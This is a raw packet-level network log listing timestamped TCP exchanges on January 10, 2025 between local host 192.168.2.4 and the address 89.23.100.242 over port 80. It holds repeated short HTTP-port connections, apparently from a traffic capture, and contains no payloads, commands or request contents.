                                                                                                Jan 10, 2025 07:58:34.550693035 CET5002380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:34.555615902 CET805002389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:34.555691004 CET5002380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:34.555908918 CET5002380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:34.560740948 CET805002389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:34.907839060 CET5002380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:34.912807941 CET805002389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:34.912823915 CET805002389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:34.912836075 CET805002389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:35.311350107 CET805002389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:35.360871077 CET5002380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:35.463435888 CET805002389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:35.517148972 CET5002380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:35.941978931 CET5002380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:35.944987059 CET5002880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:35.947072029 CET805002389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:35.947720051 CET5002380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:35.949855089 CET805002889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:35.949933052 CET5002880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:35.950889111 CET5002880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:35.955703020 CET805002889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:36.298559904 CET5002880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:36.303723097 CET805002889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:36.303741932 CET805002889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:36.303752899 CET805002889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:36.692507982 CET805002889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:36.735898972 CET5002880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:36.810141087 CET5002880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:36.815237999 CET805002889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:36.815326929 CET5002880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:36.818598032 CET5003980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:36.823426008 CET805003989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:36.823513031 CET5003980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:36.823646069 CET5003980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:36.828414917 CET805003989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:37.173472881 CET5003980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:37.178489923 CET805003989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:37.178505898 CET805003989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:37.178518057 CET805003989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:37.561105013 CET805003989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:37.610972881 CET5003980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:37.713267088 CET805003989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:37.814028978 CET5003980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:37.851094961 CET5003980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:37.852345943 CET5004580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:37.856441975 CET805003989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:37.856511116 CET5003980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:37.857218027 CET805004589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:37.857287884 CET5004580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:37.857400894 CET5004580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:37.862241983 CET805004589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:38.204751968 CET5004580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:38.209651947 CET805004589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:38.209883928 CET805004589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:38.209913015 CET805004589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:38.221052885 CET5004680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:38.221282005 CET5004580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:38.225922108 CET805004689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:38.226001978 CET5004680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:38.269961119 CET805004589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:38.270625114 CET5004680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:38.275547028 CET805004689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:38.368782997 CET805004589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:38.371337891 CET5004580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:38.628175020 CET5004680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:38.633833885 CET805004689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:38.634347916 CET805004689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:38.842470884 CET5005080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:38.847425938 CET805005089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:38.847711086 CET5005080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:38.880065918 CET5005080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:38.885044098 CET805005089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:39.107450008 CET805004689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:39.157763958 CET5004680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:39.236124992 CET5005080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:39.236702919 CET805004689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:39.240957022 CET805005089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:39.240972996 CET805005089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:39.241012096 CET805005089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:39.282859087 CET5004680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:39.586740017 CET805005089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:39.704631090 CET5005080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:39.720976114 CET805005089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:39.814109087 CET5005080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:39.842185974 CET5005080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:39.842253923 CET5004680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:39.842590094 CET5005880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:39.848709106 CET805005889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:39.848793983 CET5005880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:39.848824024 CET805005089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:39.848864079 CET5005080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:39.848947048 CET5005880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:39.849041939 CET805004689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:39.849097967 CET5004680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:39.855070114 CET805005889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:40.205039978 CET5005880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:40.212426901 CET805005889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:40.212438107 CET805005889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:40.212445974 CET805005889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:40.664228916 CET805005889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:40.798530102 CET805005889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:40.798698902 CET5005880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:40.973577976 CET5005880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:40.973829985 CET5006480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:40.979409933 CET805005889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:40.979672909 CET805006489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:40.979759932 CET5005880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:40.979784966 CET5006480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:40.979882956 CET5006480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:40.985909939 CET805006489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:41.333189964 CET5006480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:41.339494944 CET805006489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:41.339534998 CET805006489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:41.339561939 CET805006489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:41.724344969 CET805006489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:41.813990116 CET5006480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:41.962632895 CET805006489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:41.962658882 CET805006489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:41.962693930 CET5006480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:42.077984095 CET5007080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:42.082873106 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:42.082937002 CET5007080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:42.083045959 CET5007080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:42.087929010 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:42.439197063 CET5007080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:42.444222927 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:42.444241047 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:42.444263935 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:42.826157093 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:42.977946997 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:42.978024006 CET5007080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:43.098156929 CET5007080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:43.100377083 CET5007780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:43.103194952 CET805007089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.103347063 CET5007080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:43.105290890 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.105361938 CET5007780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:43.105462074 CET5007780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:43.110336065 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.454941034 CET5007780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:43.459930897 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.460033894 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.460062981 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.857805967 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.984622955 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:43.987204075 CET5007780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.107836962 CET5007780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.108071089 CET5006480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.108342886 CET5008780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.113215923 CET805007789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.113285065 CET805008789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.113297939 CET5007780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.113348007 CET5008780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.113409042 CET5008780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.118318081 CET805008789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.252477884 CET5008880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.252480030 CET5008780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.258666992 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.258744955 CET5008880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.258855104 CET5008880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.264880896 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.301173925 CET805008789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.374876022 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.379806042 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.379894018 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.380027056 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.384882927 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.610959053 CET5008880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.617481947 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.617618084 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.649086952 CET805008789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.649162054 CET5008780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.735991001 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:44.741019964 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.741051912 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:44.741077900 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.209795952 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.209836006 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.209866047 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.209893942 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.209959030 CET5008880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.251590967 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.294086933 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.345257044 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.437062979 CET5008880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.437203884 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.437309027 CET5009080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.442347050 CET805009089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.442378998 CET805008889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.442471027 CET5008880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.442492008 CET805008989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.442534924 CET5008980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.442540884 CET5009080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.442540884 CET5009080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.447408915 CET805009089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.798490047 CET5009080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:45.804363966 CET805009089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.804403067 CET805009089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:45.804431915 CET805009089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:46.219194889 CET805009089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:46.267182112 CET5009080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:46.389796019 CET805009089.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:46.439024925 CET5009080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:46.518714905 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:46.523942947 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:46.524012089 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:46.524138927 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:46.528990030 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:46.876611948 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:46.881975889 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:46.882025957 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:46.882054090 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.362629890 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.407754898 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.500628948 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.548567057 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.622792006 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.623157978 CET5009080192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.623210907 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.628156900 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.628200054 CET805009189.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.628236055 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.628248930 CET5009180192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.628360987 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.633241892 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.986047029 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:47.991272926 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.991341114 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:47.991379023 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:48.364654064 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:48.407766104 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:48.516638994 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:48.564016104 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:48.638070107 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:48.638243914 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:48.643220901 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:48.643336058 CET805009289.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:48.643358946 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:48.643476963 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:48.643496037 CET5009280192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:48.648334980 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.001590014 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.007229090 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.007246971 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.007261992 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.397394896 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.439097881 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.532780886 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.579763889 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.655388117 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.655499935 CET5009480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.660417080 CET805009489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.660495043 CET5009480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.660527945 CET805009389.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:49.660569906 CET5009380192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.660655975 CET5009480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:49.665400028 CET805009489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.017247915 CET5009480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.022279024 CET805009489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.022298098 CET805009489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.022310019 CET805009489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.221012115 CET5009580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.221309900 CET5009480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.226372957 CET805009589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.226458073 CET5009580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.226541996 CET5009580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.226577044 CET805009489.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.226641893 CET5009480192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.231399059 CET805009589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.341836929 CET5009680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.346837997 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.346906900 CET5009680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.347024918 CET5009680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.351917028 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.579921007 CET5009580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.585321903 CET805009589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.585361958 CET805009589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.704745054 CET5009680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:50.709893942 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.709975004 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.709989071 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:50.990257025 CET805009589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:51.032881975 CET5009580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.084093094 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:51.126512051 CET5009680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.142091990 CET805009589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:51.189024925 CET5009580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.212939978 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:51.267133951 CET5009680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.329315901 CET5009580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.329369068 CET5009680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.330323935 CET5009780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.336044073 CET805009589.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:51.336124897 CET5009580192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.336308002 CET805009689.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:51.336350918 CET5009680192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.336811066 CET805009789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:51.336874008 CET5009780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.336992979 CET5009780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.343544006 CET805009789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:51.689127922 CET5009780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:51.694142103 CET805009789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:51.694159031 CET805009789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:51.694174051 CET805009789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:52.103879929 CET805009789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:52.157773018 CET5009780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:52.291888952 CET805009789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:52.345261097 CET5009780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:52.420583010 CET5009780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:52.421906948 CET5009880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:52.425795078 CET805009789.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:52.425862074 CET5009780192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:52.426755905 CET805009889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:52.426811934 CET5009880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:52.427025080 CET5009880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:52.431756020 CET805009889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:52.782845974 CET5009880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:52.788069010 CET805009889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:52.788110018 CET805009889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:52.788136959 CET805009889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:53.275991917 CET805009889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:53.329639912 CET5009880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:53.427634954 CET805009889.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:53.470264912 CET5009880192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:53.544688940 CET5009980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:53.549768925 CET805009989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:53.549889088 CET5009980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:53.549983978 CET5009980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:53.554897070 CET805009989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:53.907850027 CET5009980192.168.2.489.23.100.242
                                                                                                Jan 10, 2025 07:58:53.912977934 CET805009989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:53.913007975 CET805009989.23.100.242192.168.2.4
                                                                                                Jan 10, 2025 07:58:53.913041115 CET805009989.23.100.242192.168.2.4
